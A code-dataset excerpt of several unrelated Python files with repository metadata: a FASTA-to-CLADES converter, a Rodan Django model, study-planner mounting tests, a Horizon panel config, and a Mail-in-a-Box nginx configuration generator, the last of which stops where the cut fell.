tkchafin/file_converters
|
635beec418bd4593bb6f724e289ab939633c00c3
|
[
"MIT"
] | 1
|
2020-11-17T06:19:29.000Z
|
2020-11-17T06:19:29.000Z
|
multifasta2clades.py
|
tkchafin/file_converters
|
635beec418bd4593bb6f724e289ab939633c00c3
|
[
"MIT"
] | 2
|
2018-11-03T20:50:31.000Z
|
2021-09-15T15:18:11.000Z
|
multifasta2clades.py
|
tkchafin/file_converters
|
635beec418bd4593bb6f724e289ab939633c00c3
|
[
"MIT"
] | 1
|
2020-06-22T20:51:46.000Z
|
2020-06-22T20:51:46.000Z
|
#!/usr/bin/env python
# Script written by Bradley T. Martin, PhD Candidate, University of Arkansas.
# Please report any issues or bugs to btm002@email.uark.edu
import argparse # parse command-line arguments.
import os # needed for listing directory of fasta files.
import sys # used for exiting if conditions not met.
from Bio import AlignIO # to read fasta files.
def main():
args = Get_Arguments() # uses argparse.
popmap = read_popmap(args.popmap)
indcount = len(popmap)
with open(args.outfile, "w") as fout:
fout.write("\n\n") # Write two empty lines at beginning of file.
for filename in os.listdir(args.dir):
fas = read_fasta(filename, args.dir) # Uses biopython AlignIO
alnLen = fas.get_alignment_length() # Gets max length of each alignment
ninds = len(fas) # Gets number of sequences
header = "{} {}".format(indcount, alnLen) # Make header for each locus.
indlist = list()
with open(args.outfile, "a") as fout:
fout.write(header + "\n")
# If present in popmap: get list of individuals
new_popmap = {k.id: popmap[k.id] for k in fas if k.id in popmap}
ind_id_list = [record.id for record in fas]
# For finding individual missing from alignment
missing_inds = dict()
for k, v in popmap.items():
if k not in ind_id_list:
missing_inds[k] = v
indlist = list(("{}^{}".format(key, value) for key, value in new_popmap.items()))
missing_ind_list = list(("{}^{}".format(key, value) for key, value in missing_inds.items()))
# Makes new dictionary in format of ind1^pop1
new_fasta_dict = dict()
for ind in indlist:
first = ind.split("^")
for record in fas:
if first[0] == record.id:
new_fasta_dict[ind] = str(record.seq)
# Write all dashes for missing indivuals. length = alnLen
missing_seq = repeat_to_length("-", alnLen)
missing_dict = {k: missing_seq for k in missing_ind_list}
# Add individuals with all missing data to dictionary
new_fasta_dict.update(missing_dict)
for key in sorted(new_fasta_dict):
fout.write("{}\t{}\n".format(key, new_fasta_dict[key]))
fout.write("\n\n")
def repeat_to_length(string_to_expand, length):
return (string_to_expand * ((length/len(string_to_expand))+1))[:length]
def read_popmap(filename):
"""
Function to read a two-column tab-separated file and save the first column as dictionary keys and second as values.
Input: filename
Returns: dictionary[col1] = col2.
"""
mydict = dict()
with open(filename, "r") as fin:
for line in fin: # Read file line by line.
line = line.strip()
if not line:
continue
cols = line.split()
mydict[cols[0]] = cols[1] # Make dictionary from popmap.
return mydict
def read_fasta(filename, mydir):
"""
Reads fasta file using biopython's AlignIO.
Used in generator with directory of fasta files.
Inputs: filename, directory of input files.
Returns: file contents.
"""
# Remove forward slash if present.
if mydir.endswith("/"):
mydir = mydir[:-1]
mypath = str(mydir) + "/" + str(filename)
file = AlignIO.read(open(mypath), 'fasta') # from biopython
return file
def Get_Arguments():
"""
Parse command-line arguments. Imported with argparse.
Returns: object of command-line arguments.
"""
parser = argparse.ArgumentParser(description="Converts directory of FASTA files to input file for CLADES for species delimitation", add_help=False)
required_args = parser.add_argument_group("Required Arguments")
optional_args = parser.add_argument_group("Optional Arguments")
## Required Arguments
required_args.add_argument("-d", "--dir",
type=str,
required=True,
help="Specify directory containing only input FASTA files.")
required_args.add_argument("-o", "--outfile",
type=str,
required=True,
help="String; Specify output CLADES filename")
required_args.add_argument("-p", "--popmap",
type=str,
required=True,
help="String; Specify two-column tab-delimited popmap file: IndID\tPopID; no header line.")
optional_args.add_argument("-h", "--help",
action="help",
help="Displays this help menu")
# If no arguments specified print help and die.
if len(sys.argv)==1:
print("\nExiting because no command-line options were called.\n")
parser.print_help(sys.stderr)
sys.exit(1)
args = parser.parse_args()
return args
if __name__ == "__main__":
main()
| 37.955882
| 151
| 0.591437
|
4a07dadf8d4d47a51dde0ead2a3a18540ebd394d
| 2,228
|
py
|
Python
|
rodan/models/input.py
|
carrieeex/Rodan
|
458e72990c2571fa727a0d026fb235faf30bffec
|
[
"MIT"
] | 31
|
2015-01-06T17:23:45.000Z
|
2022-03-30T02:46:16.000Z
|
rodan/models/input.py
|
carrieeex/Rodan
|
458e72990c2571fa727a0d026fb235faf30bffec
|
[
"MIT"
] | 258
|
2015-01-02T19:34:57.000Z
|
2022-01-19T16:34:21.000Z
|
rodan/models/input.py
|
carrieeex/Rodan
|
458e72990c2571fa727a0d026fb235faf30bffec
|
[
"MIT"
] | 8
|
2015-08-19T16:09:31.000Z
|
2021-10-03T23:46:46.000Z
|
from django.db import models
from rodan.models.inputporttype import InputPortType
import uuid
class Input(models.Model):
"""
Links a `RunJob` to one of its input `Resource`s. There must be
one `Input` for each `InputPort` of the `WorkflowJob`.
**Fields**
- `uuid`
- `input_port` -- a reference to an `InputPort`. It should be set to None when the
original `InputPort` is deleted.
- `input_port_type_name` -- a string containing the name of the `InputPortType`.
- `resource` -- a field containing a reference to the precise `Resource` that
this `RunJob` will act on.
- `resource_list` -- a field containing a reference to the precise `ResourceList` that
this `RunJob` will act on.
- `run_job` -- a reference to the `RunJob` that will be executed.
**Properties**
- `input_port_type` -- the corresponding `InputPortType` object.
"""
class Meta:
app_label = "rodan"
permissions = (("view_input", "View Input"),)
uuid = models.UUIDField(primary_key=True, editable=False, default=uuid.uuid4)
input_port = models.ForeignKey(
"rodan.InputPort",
related_name="inputs",
blank=True,
null=True,
on_delete=models.SET_NULL,
db_index=True,
)
input_port_type_name = models.CharField(max_length=255, db_index=True)
resource = models.ForeignKey(
"rodan.Resource",
related_name="inputs",
on_delete=models.PROTECT,
db_index=True,
null=True,
blank=True,
)
resource_list = models.ForeignKey(
"rodan.ResourceList",
related_name="inputs",
on_delete=models.PROTECT,
db_index=True,
null=True,
blank=True,
)
run_job = models.ForeignKey(
"rodan.RunJob", related_name="inputs", on_delete=models.CASCADE, db_index=True
)
def __unicode__(self):
return u"<Input {0}>".format(str(self.uuid))
@property
def input_port_type(self):
try:
return InputPortType.objects.get(
job__name=self.run_job.job_name, name=self.input_port_type_name
)
except InputPortType.DoesNotExist:
return None
| 30.520548
| 90
| 0.635099
|
4a07db19fb38a0ae86fefce2f12e8482e213f03d
| 17,783
|
py
|
Python
|
test/test_individual_module_mounting_backend.py
|
nus-mtp/another-cs-study-planner
|
02b52871a34f580b779ede08750f2d4e887bcf65
|
[
"MIT"
] | 1
|
2017-04-30T17:59:08.000Z
|
2017-04-30T17:59:08.000Z
|
test/test_individual_module_mounting_backend.py
|
nus-mtp/another-cs-study-planner
|
02b52871a34f580b779ede08750f2d4e887bcf65
|
[
"MIT"
] | 87
|
2017-02-13T09:06:13.000Z
|
2017-04-14T09:23:08.000Z
|
test/test_individual_module_mounting_backend.py
|
nus-mtp/another-cs-study-planner
|
02b52871a34f580b779ede08750f2d4e887bcf65
|
[
"MIT"
] | 1
|
2017-04-11T05:26:00.000Z
|
2017-04-11T05:26:00.000Z
|
'''
test_individual_module_mounting_backend.py
Contains test cases related to backened functions for displaying an individual module's mounting
'''
from nose.tools import assert_equal, assert_true
from components.handlers.module_overview import ViewMod
from components.handlers.module_view_in_ay_sem import IndividualModule
from components import model
class TestCode(object):
'''
This class runs the test cases related to displaying an individual module's mounting.
'''
def __init__(self):
self.module_overview_handler = None
self.current_ay = None
self.next_ay = None
def get_next_ay(self, ay):
'''
Return the AY that comes after the current AY
'''
ay = ay.split(' ')[1].split('/')
return 'AY ' + str(int(ay[0])+1) + '/' + str(int(ay[1])+1)
def setUp(self):
'''
Add dummy modules and mountings into database
'''
self.module_overview_handler = ViewMod()
self.mounting_view_handler = IndividualModule()
self.current_ay = model.get_current_ay()
self.next_ay = self.get_next_ay(self.current_ay)
# Dummy modules
model.add_module('BB1001', 'Dummy Module 1',
'This module is mounted in both sems in both AYs.', 1, 'Active')
model.add_module('BB1002', 'Dummy Module 2',
'This module is mounted in sem 1 only, in both AYs.', 2, 'Active')
model.add_module('BB1003', 'Dummy Module 3',
'This module is mounted in sem 2 only, in both AYs.', 3, 'Active')
model.add_module('BB1004', 'Dummy Module 4',
'This module is not mounted in any sem, in both AYs.', 4, 'Active')
# Dummy fixed mountings
model.add_fixed_mounting('BB1001', self.current_ay+' Sem 1', 10)
model.add_fixed_mounting('BB1001', self.current_ay+' Sem 2', 20)
model.add_fixed_mounting('BB1002', self.current_ay+' Sem 1', 30)
model.add_fixed_mounting('BB1003', self.current_ay+' Sem 2', 40)
# Dummy tentative mountings
model.add_tenta_mounting('BB1001', self.next_ay+' Sem 1', 10)
model.add_tenta_mounting('BB1001', self.next_ay+' Sem 2', 20)
model.add_tenta_mounting('BB1002', self.next_ay+' Sem 1', 30)
model.add_tenta_mounting('BB1003', self.next_ay+' Sem 2', 40)
def tearDown(self):
'''
Clean up the database after all test cases are ran
'''
model.delete_fixed_mounting('BB1001', self.current_ay+' Sem 1')
model.delete_fixed_mounting('BB1001', self.current_ay+' Sem 2')
model.delete_fixed_mounting('BB1002', self.current_ay+' Sem 1')
model.delete_fixed_mounting('BB1003', self.current_ay+' Sem 2')
model.delete_tenta_mounting('BB1001', self.next_ay+' Sem 1')
model.delete_tenta_mounting('BB1001', self.next_ay+' Sem 2')
model.delete_tenta_mounting('BB1002', self.next_ay+' Sem 1')
model.delete_tenta_mounting('BB1003', self.next_ay+' Sem 2')
model.delete_module('BB1001')
model.delete_module('BB1002')
model.delete_module('BB1003')
model.delete_module('BB1004')
def test_mounted_in_both_sems(self):
'''
Tests that a module that is mounted in both sems in both AYs
will have the mounting values '1' and '1' for both AYs
'''
test_module_code = "BB1001"
self.module_overview_handler.load_fixed_mounting_plan(test_module_code)
self.module_overview_handler.load_tenta_mounting_plan(test_module_code)
fixed_mounting_plan = self.module_overview_handler.fixed_mounting_plan
tenta_mounting_plan = self.module_overview_handler.tenta_mounting_plan
assert_true(len(fixed_mounting_plan) == 2)
assert_true(len(tenta_mounting_plan) > 0)
fixed_sem_1_mounting_value = fixed_mounting_plan[0][1]
fixed_sem_2_mounting_value = fixed_mounting_plan[1][1]
fixed_sem_1_quota = fixed_mounting_plan[0][2]
fixed_sem_2_quota = fixed_mounting_plan[1][2]
assert_equal(fixed_sem_1_mounting_value, 1)
assert_equal(fixed_sem_2_mounting_value, 1)
assert_equal(fixed_sem_1_quota, 10)
assert_equal(fixed_sem_2_quota, 20)
tenta_sem_1_mounting_value = tenta_mounting_plan[0][1]
tenta_sem_2_mounting_value = tenta_mounting_plan[1][1]
tenta_sem_1_quota = tenta_mounting_plan[0][2]
tenta_sem_2_quota = tenta_mounting_plan[1][2]
assert_equal(tenta_sem_1_mounting_value, 1)
assert_equal(tenta_sem_2_mounting_value, 1)
assert_equal(tenta_sem_1_quota, 10)
assert_equal(tenta_sem_2_quota, 20)
self.mounting_view_handler.load_mounting_info(test_module_code, self.current_ay+' Sem 1')
assert_equal(self.mounting_view_handler.mounting_status, 1)
assert_equal(self.mounting_view_handler.quota, 10)
self.mounting_view_handler.load_mounting_info(test_module_code, self.current_ay+' Sem 2')
assert_equal(self.mounting_view_handler.mounting_status, 1)
assert_equal(self.mounting_view_handler.quota, 20)
self.mounting_view_handler.load_mounting_info(test_module_code, self.next_ay+' Sem 1')
assert_equal(self.mounting_view_handler.mounting_status, 1)
assert_equal(self.mounting_view_handler.quota, 10)
self.mounting_view_handler.load_mounting_info(test_module_code, self.next_ay+' Sem 2')
assert_equal(self.mounting_view_handler.mounting_status, 1)
assert_equal(self.mounting_view_handler.quota, 20)
def test_mounted_in_sem_1_only(self):
'''
Tests that a module that is mounted in sem 1 only, in both AYs,
will have the mounting values '1' and '-1' for both AYs
'''
test_module_code = "BB1002"
self.module_overview_handler.load_fixed_mounting_plan(test_module_code)
self.module_overview_handler.load_tenta_mounting_plan(test_module_code)
fixed_mounting_plan = self.module_overview_handler.fixed_mounting_plan
tenta_mounting_plan = self.module_overview_handler.tenta_mounting_plan
assert_true(len(fixed_mounting_plan) == 2)
assert_true(len(tenta_mounting_plan) > 0)
fixed_sem_1_mounting_value = fixed_mounting_plan[0][1]
fixed_sem_2_mounting_value = fixed_mounting_plan[1][1]
fixed_sem_1_quota = fixed_mounting_plan[0][2]
fixed_sem_2_quota = fixed_mounting_plan[1][2]
assert_equal(fixed_sem_1_mounting_value, 1)
assert_equal(fixed_sem_2_mounting_value, -1)
assert_equal(fixed_sem_1_quota, 30)
assert_equal(fixed_sem_2_quota, '-')
tenta_sem_1_mounting_value = tenta_mounting_plan[0][1]
tenta_sem_2_mounting_value = tenta_mounting_plan[1][1]
tenta_sem_1_quota = tenta_mounting_plan[0][2]
tenta_sem_2_quota = tenta_mounting_plan[1][2]
assert_equal(tenta_sem_1_mounting_value, 1)
assert_equal(tenta_sem_2_mounting_value, -1)
assert_equal(tenta_sem_1_quota, 30)
assert_equal(tenta_sem_2_quota, '-')
self.mounting_view_handler.load_mounting_info(test_module_code, self.current_ay+' Sem 1')
assert_equal(self.mounting_view_handler.mounting_status, 1)
assert_equal(self.mounting_view_handler.quota, 30)
self.mounting_view_handler.load_mounting_info(test_module_code, self.current_ay+' Sem 2')
assert_equal(self.mounting_view_handler.mounting_status, -1)
assert_equal(self.mounting_view_handler.quota, '-')
self.mounting_view_handler.load_mounting_info(test_module_code, self.next_ay+' Sem 1')
assert_equal(self.mounting_view_handler.mounting_status, 1)
assert_equal(self.mounting_view_handler.quota, 30)
self.mounting_view_handler.load_mounting_info(test_module_code, self.next_ay+' Sem 2')
assert_equal(self.mounting_view_handler.mounting_status, -1)
assert_equal(self.mounting_view_handler.quota, '-')
def test_mounted_in_sem_2_only(self):
'''
Tests that a module that is mounted in sem 2 only, in both AYs,
will have the mounting values '-1' and '1' for both AYs
'''
test_module_code = "BB1003"
self.module_overview_handler.load_fixed_mounting_plan(test_module_code)
self.module_overview_handler.load_tenta_mounting_plan(test_module_code)
fixed_mounting_plan = self.module_overview_handler.fixed_mounting_plan
tenta_mounting_plan = self.module_overview_handler.tenta_mounting_plan
assert_true(len(fixed_mounting_plan) == 2)
assert_true(len(tenta_mounting_plan) > 0)
fixed_sem_1_mounting_value = fixed_mounting_plan[0][1]
fixed_sem_2_mounting_value = fixed_mounting_plan[1][1]
fixed_sem_1_quota = fixed_mounting_plan[0][2]
fixed_sem_2_quota = fixed_mounting_plan[1][2]
assert_equal(fixed_sem_1_mounting_value, -1)
assert_equal(fixed_sem_2_mounting_value, 1)
assert_equal(fixed_sem_1_quota, '-')
assert_equal(fixed_sem_2_quota, 40)
tenta_sem_1_mounting_value = tenta_mounting_plan[0][1]
tenta_sem_2_mounting_value = tenta_mounting_plan[1][1]
tenta_sem_1_quota = tenta_mounting_plan[0][2]
tenta_sem_2_quota = tenta_mounting_plan[1][2]
assert_equal(tenta_sem_1_mounting_value, -1)
assert_equal(tenta_sem_2_mounting_value, 1)
assert_equal(tenta_sem_1_quota, '-')
assert_equal(tenta_sem_2_quota, 40)
self.mounting_view_handler.load_mounting_info(test_module_code, self.current_ay+' Sem 1')
assert_equal(self.mounting_view_handler.mounting_status, -1)
assert_equal(self.mounting_view_handler.quota, '-')
self.mounting_view_handler.load_mounting_info(test_module_code, self.current_ay+' Sem 2')
assert_equal(self.mounting_view_handler.mounting_status, 1)
assert_equal(self.mounting_view_handler.quota, 40)
self.mounting_view_handler.load_mounting_info(test_module_code, self.next_ay+' Sem 1')
assert_equal(self.mounting_view_handler.mounting_status, -1)
assert_equal(self.mounting_view_handler.quota, '-')
self.mounting_view_handler.load_mounting_info(test_module_code, self.next_ay+' Sem 2')
assert_equal(self.mounting_view_handler.mounting_status, 1)
assert_equal(self.mounting_view_handler.quota, 40)
def test_not_mounted(self):
'''
Tests that a module that is not mounted in any sem, in both AYs,
will have the mounting values '-1' and '-1' for both AYs
'''
test_module_code = "BB1004"
self.module_overview_handler.load_fixed_mounting_plan(test_module_code)
self.module_overview_handler.load_tenta_mounting_plan(test_module_code)
fixed_mounting_plan = self.module_overview_handler.fixed_mounting_plan
tenta_mounting_plan = self.module_overview_handler.tenta_mounting_plan
assert_true(len(fixed_mounting_plan) == 2)
assert_true(len(tenta_mounting_plan) > 0)
fixed_sem_1_mounting_value = fixed_mounting_plan[0][1]
fixed_sem_2_mounting_value = fixed_mounting_plan[1][1]
fixed_sem_1_quota = fixed_mounting_plan[0][2]
fixed_sem_2_quota = fixed_mounting_plan[1][2]
assert_equal(fixed_sem_1_mounting_value, -1)
assert_equal(fixed_sem_2_mounting_value, -1)
assert_equal(fixed_sem_1_quota, '-')
assert_equal(fixed_sem_2_quota, '-')
tenta_sem_1_mounting_value = tenta_mounting_plan[0][1]
tenta_sem_2_mounting_value = tenta_mounting_plan[1][1]
tenta_sem_1_quota = tenta_mounting_plan[0][2]
tenta_sem_2_quota = tenta_mounting_plan[1][2]
assert_equal(tenta_sem_1_mounting_value, -1)
assert_equal(tenta_sem_2_mounting_value, -1)
assert_equal(tenta_sem_1_quota, '-')
assert_equal(tenta_sem_2_quota, '-')
self.mounting_view_handler.load_mounting_info(test_module_code, self.current_ay+' Sem 1')
assert_equal(self.mounting_view_handler.mounting_status, -1)
assert_equal(self.mounting_view_handler.quota, '-')
self.mounting_view_handler.load_mounting_info(test_module_code, self.current_ay+' Sem 2')
assert_equal(self.mounting_view_handler.mounting_status, -1)
assert_equal(self.mounting_view_handler.quota, '-')
self.mounting_view_handler.load_mounting_info(test_module_code, self.next_ay+' Sem 1')
assert_equal(self.mounting_view_handler.mounting_status, -1)
assert_equal(self.mounting_view_handler.quota, '-')
self.mounting_view_handler.load_mounting_info(test_module_code, self.next_ay+' Sem 2')
assert_equal(self.mounting_view_handler.mounting_status, -1)
assert_equal(self.mounting_view_handler.quota, '-')
def test_unmounted_from_sem_1(self):
'''
Tests that a module that is unmounted from sem 1
will have the tentative-mounting value of '0' for sem 1
'''
test_module_code = "BB1002"
model.delete_tenta_mounting(test_module_code, self.next_ay+' Sem 1')
self.module_overview_handler.load_fixed_mounting_plan(test_module_code)
self.module_overview_handler.load_tenta_mounting_plan(test_module_code)
tenta_mounting_plan = self.module_overview_handler.tenta_mounting_plan
assert_true(len(tenta_mounting_plan) > 0)
tenta_sem_1_mounting_value = tenta_mounting_plan[0][1]
tenta_sem_1_quota = tenta_mounting_plan[0][2]
assert_equal(tenta_sem_1_mounting_value, 0)
assert_equal(tenta_sem_1_quota, '-')
self.mounting_view_handler.load_mounting_info(test_module_code, self.current_ay+' Sem 1')
assert_equal(self.mounting_view_handler.mounting_status, 1)
assert_equal(self.mounting_view_handler.quota, 30)
self.mounting_view_handler.load_mounting_info(test_module_code, self.next_ay+' Sem 1')
assert_equal(self.mounting_view_handler.mounting_status, 0)
assert_equal(self.mounting_view_handler.quota, '-')
model.add_tenta_mounting(test_module_code, self.next_ay+' Sem 1', 30)
def test_unmounted_from_sem_2(self):
'''
Tests that a module that is unmounted from sem 2
will have the tentative-mounting value of '0' for sem 2
'''
test_module_code = "BB1003"
model.delete_tenta_mounting(test_module_code, self.next_ay+' Sem 2')
self.module_overview_handler.load_fixed_mounting_plan(test_module_code)
self.module_overview_handler.load_tenta_mounting_plan(test_module_code)
tenta_mounting_plan = self.module_overview_handler.tenta_mounting_plan
assert_true(len(tenta_mounting_plan) > 0)
tenta_sem_2_mounting_value = tenta_mounting_plan[1][1]
tenta_sem_2_quota = tenta_mounting_plan[1][2]
assert_equal(tenta_sem_2_mounting_value, 0)
assert_equal(tenta_sem_2_quota, '-')
self.mounting_view_handler.load_mounting_info(test_module_code, self.current_ay+' Sem 2')
assert_equal(self.mounting_view_handler.mounting_status, 1)
assert_equal(self.mounting_view_handler.quota, 40)
self.mounting_view_handler.load_mounting_info(test_module_code, self.next_ay+' Sem 2')
assert_equal(self.mounting_view_handler.mounting_status, 0)
assert_equal(self.mounting_view_handler.quota, '-')
model.add_tenta_mounting(test_module_code, self.next_ay+' Sem 2', 40)
def test_unmounted_from_both_sems(self):
'''
Tests that a module that is unmounted from both sems
will have the tentative-mounting values '0' and '0'
'''
test_module_code = "BB1001"
model.delete_tenta_mounting(test_module_code, self.next_ay+' Sem 1')
model.delete_tenta_mounting(test_module_code, self.next_ay+' Sem 2')
self.module_overview_handler.load_fixed_mounting_plan(test_module_code)
self.module_overview_handler.load_tenta_mounting_plan(test_module_code)
tenta_mounting_plan = self.module_overview_handler.tenta_mounting_plan
assert_true(len(tenta_mounting_plan) > 0)
tenta_sem_1_mounting_value = tenta_mounting_plan[0][1]
tenta_sem_1_quota = tenta_mounting_plan[0][2]
tenta_sem_2_mounting_value = tenta_mounting_plan[1][1]
tenta_sem_2_quota = tenta_mounting_plan[1][2]
assert_equal(tenta_sem_1_mounting_value, 0)
assert_equal(tenta_sem_1_quota, '-')
assert_equal(tenta_sem_2_mounting_value, 0)
assert_equal(tenta_sem_2_quota, '-')
self.mounting_view_handler.load_mounting_info(test_module_code, self.current_ay+' Sem 1')
assert_equal(self.mounting_view_handler.mounting_status, 1)
assert_equal(self.mounting_view_handler.quota, 10)
self.mounting_view_handler.load_mounting_info(test_module_code, self.current_ay+' Sem 2')
assert_equal(self.mounting_view_handler.mounting_status, 1)
assert_equal(self.mounting_view_handler.quota, 20)
self.mounting_view_handler.load_mounting_info(test_module_code, self.next_ay+' Sem 1')
assert_equal(self.mounting_view_handler.mounting_status, 0)
assert_equal(self.mounting_view_handler.quota, '-')
self.mounting_view_handler.load_mounting_info(test_module_code, self.next_ay+' Sem 2')
assert_equal(self.mounting_view_handler.mounting_status, 0)
assert_equal(self.mounting_view_handler.quota, '-')
model.add_tenta_mounting(test_module_code, self.next_ay+' Sem 1', 10)
model.add_tenta_mounting(test_module_code, self.next_ay+' Sem 2', 20)
| 48.32337
| 100
| 0.714503
|
4a07dbd2759e1adc3cea2779e0b4dbe21b23ca02
| 39
|
py
|
Python
|
lang/py/cookbook/v2/source/cb2_19_4_exm_3.py
|
ch1huizong/learning
|
632267634a9fd84a5f5116de09ff1e2681a6cc85
|
[
"MIT"
] | null | null | null |
lang/py/cookbook/v2/source/cb2_19_4_exm_3.py
|
ch1huizong/learning
|
632267634a9fd84a5f5116de09ff1e2681a6cc85
|
[
"MIT"
] | null | null | null |
lang/py/cookbook/v2/source/cb2_19_4_exm_3.py
|
ch1huizong/learning
|
632267634a9fd84a5f5116de09ff1e2681a6cc85
|
[
"MIT"
] | null | null | null |
c = iter(t5)
a = c.next()
b = c.next()
| 9.75
| 12
| 0.487179
|
4a07dc31aec5bc3107b692bc44cb4849f5a82f1b
| 985
|
py
|
Python
|
iotronic_ui/enabled/_6030_iot_services_panel.py
|
smartmeio/stack4things-iotronic-ui
|
b0324c020bb4d5d74cfa9795f90c02fadae4fa8b
|
[
"Apache-2.0"
] | 1
|
2021-11-03T12:00:44.000Z
|
2021-11-03T12:00:44.000Z
|
iotronic_ui/enabled/_6030_iot_services_panel.py
|
smartmeio/stack4things-iotronic-ui
|
b0324c020bb4d5d74cfa9795f90c02fadae4fa8b
|
[
"Apache-2.0"
] | 1
|
2018-10-17T10:59:55.000Z
|
2018-10-30T11:58:40.000Z
|
iotronic_ui/enabled/_6030_iot_services_panel.py
|
smartmeio/stack4things-iotronic-ui
|
b0324c020bb4d5d74cfa9795f90c02fadae4fa8b
|
[
"Apache-2.0"
] | null | null | null |
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# The slug of the panel to be added to HORIZON_CONFIG. Required.
PANEL = 'services'
# The slug of the dashboard the PANEL associated with. Required.
PANEL_DASHBOARD = 'iot'
# The slug of the panel group the PANEL is associated with.
PANEL_GROUP = 'iot'
# If set, it will update the default panel of the PANEL_DASHBOARD.
DEFAULT_PANEL = ''
# Python panel class of the PANEL to be added.
ADD_PANEL = 'iotronic_ui.iot.services.panel.Services'
| 41.041667
| 74
| 0.763452
|
4a07dc9eb9317135abe983bf307ea03b02545093
| 10,018
|
py
|
Python
|
management/web_update.py
|
doofpot/mailinabox
|
421846f06736b1af5fcb0e6dfdb731c90077f8fa
|
[
"CC0-1.0"
] | null | null | null |
management/web_update.py
|
doofpot/mailinabox
|
421846f06736b1af5fcb0e6dfdb731c90077f8fa
|
[
"CC0-1.0"
] | null | null | null |
management/web_update.py
|
doofpot/mailinabox
|
421846f06736b1af5fcb0e6dfdb731c90077f8fa
|
[
"CC0-1.0"
] | null | null | null |
# Creates an nginx configuration file so we serve HTTP/HTTPS on all
# domains for which a mail account has been set up.
########################################################################
import os.path, re, rtyaml
from mailconfig import get_mail_domains
from dns_update import get_custom_dns_config, get_dns_zones
from ssl_certificates import get_ssl_certificates, get_domain_ssl_files, check_certificate
from utils import shell, safe_domain_name, sort_domains
def get_web_domains(env, include_www_redirects=True, exclude_dns_elsewhere=True):
# What domains should we serve HTTP(S) for?
domains = set()
# Serve web for all mail domains so that we might at least
# provide auto-discover of email settings, and also a static website
# if the user wants to make one.
domains |= get_mail_domains(env)
if include_www_redirects:
# Add 'www.' subdomains that we want to provide default redirects
# to the main domain for. We'll add 'www.' to any DNS zones, i.e.
# the topmost of each domain we serve.
domains |= set('www.' + zone for zone, zonefile in get_dns_zones(env))
# Add Autoconfiguration domains, allowing us to serve correct SSL certs.
# 'autoconfig.' for Mozilla Thunderbird auto setup.
# 'autodiscover.' for Activesync autodiscovery.
domains |= set('autoconfig.' + maildomain for maildomain in get_mail_domains(env))
domains |= set('autodiscover.' + maildomain for maildomain in get_mail_domains(env))
# 'mta-sts.' for MTA-STS support.
domains |= set('mta-sts.' + maildomain for maildomain in get_mail_domains(env))
if exclude_dns_elsewhere:
# ...Unless the domain has an A/AAAA record that maps it to a different
# IP address than this box. Remove those domains from our list.
domains -= get_domains_with_a_records(env)
# Ensure the PRIMARY_HOSTNAME is in the list so we can serve webmail
# as well as Z-Push for Exchange ActiveSync. This can't be removed
# by a custom A/AAAA record and is never a 'www.' redirect.
domains.add(env['PRIMARY_HOSTNAME'])
# Sort the list so the nginx conf gets written in a stable order.
domains = sort_domains(domains, env)
return domains
def get_domains_with_a_records(env):
domains = set()
dns = get_custom_dns_config(env)
for domain, rtype, value in dns:
if rtype == "CNAME" or (rtype in ("A", "AAAA") and value not in ("local", env['PUBLIC_IP'])):
domains.add(domain)
return domains
def get_web_domains_with_root_overrides(env):
# Load custom settings so we can tell what domains have a redirect or proxy set up on '/',
# which means static hosting is not happening.
root_overrides = { }
nginx_conf_custom_fn = os.path.join(env["STORAGE_ROOT"], "www/custom.yaml")
if os.path.exists(nginx_conf_custom_fn):
custom_settings = rtyaml.load(open(nginx_conf_custom_fn))
for domain, settings in custom_settings.items():
for type, value in [('redirect', settings.get('redirects', {}).get('/')),
('proxy', settings.get('proxies', {}).get('/'))]:
if value:
root_overrides[domain] = (type, value)
return root_overrides
def do_web_update(env):
# Pre-load what SSL certificates we will use for each domain.
ssl_certificates = get_ssl_certificates(env)
# Build an nginx configuration file.
nginx_conf = open(os.path.join(os.path.dirname(__file__), "../conf/nginx-top.conf")).read()
# Load the templates.
template0 = open(os.path.join(os.path.dirname(__file__), "../conf/nginx.conf")).read()
template1 = open(os.path.join(os.path.dirname(__file__), "../conf/nginx-alldomains.conf")).read()
template2 = open(os.path.join(os.path.dirname(__file__), "../conf/nginx-primaryonly.conf")).read()
template3 = "\trewrite ^(.*) https://$REDIRECT_DOMAIN$1 permanent;\n"
# Add the PRIMARY_HOST configuration first so it becomes nginx's default server.
nginx_conf += make_domain_config(env['PRIMARY_HOSTNAME'], [template0, template1, template2], ssl_certificates, env)
# Add configuration all other web domains.
has_root_proxy_or_redirect = get_web_domains_with_root_overrides(env)
web_domains_not_redirect = get_web_domains(env, include_www_redirects=False)
for domain in get_web_domains(env):
if domain == env['PRIMARY_HOSTNAME']:
# PRIMARY_HOSTNAME is handled above.
continue
if domain in web_domains_not_redirect:
# This is a regular domain.
if domain not in has_root_proxy_or_redirect:
nginx_conf += make_domain_config(domain, [template0, template1], ssl_certificates, env)
else:
nginx_conf += make_domain_config(domain, [template0], ssl_certificates, env)
else:
# Add default 'www.' redirect.
nginx_conf += make_domain_config(domain, [template0, template3], ssl_certificates, env)
# Did the file change? If not, don't bother writing & restarting nginx.
nginx_conf_fn = "/etc/nginx/conf.d/local.conf"
if os.path.exists(nginx_conf_fn):
with open(nginx_conf_fn) as f:
if f.read() == nginx_conf:
return ""
# Save the file.
with open(nginx_conf_fn, "w") as f:
f.write(nginx_conf)
# Kick nginx. Since this might be called from the web admin
# don't do a 'restart'. That would kill the connection before
# the API returns its response. A 'reload' should be good
# enough and doesn't break any open connections.
shell('check_call', ["/usr/sbin/service", "nginx", "reload"])
return "web updated\n"
def make_domain_config(domain, templates, ssl_certificates, env):
# GET SOME VARIABLES
# Where will its root directory be for static files?
root = get_web_root(domain, env)
# What private key and SSL certificate will we use for this domain?
tls_cert = get_domain_ssl_files(domain, ssl_certificates, env)
# ADDITIONAL DIRECTIVES.
nginx_conf_extra = ""
# Because the certificate may change, we should recognize this so we
# can trigger an nginx update.
def hashfile(filepath):
import hashlib
sha1 = hashlib.sha1()
f = open(filepath, 'rb')
try:
sha1.update(f.read())
finally:
f.close()
return sha1.hexdigest()
nginx_conf_extra += "# ssl files sha1: %s / %s\n" % (hashfile(tls_cert["private-key"]), hashfile(tls_cert["certificate"]))
# Add in any user customizations in YAML format.
hsts = "yes"
nginx_conf_custom_fn = os.path.join(env["STORAGE_ROOT"], "www/custom.yaml")
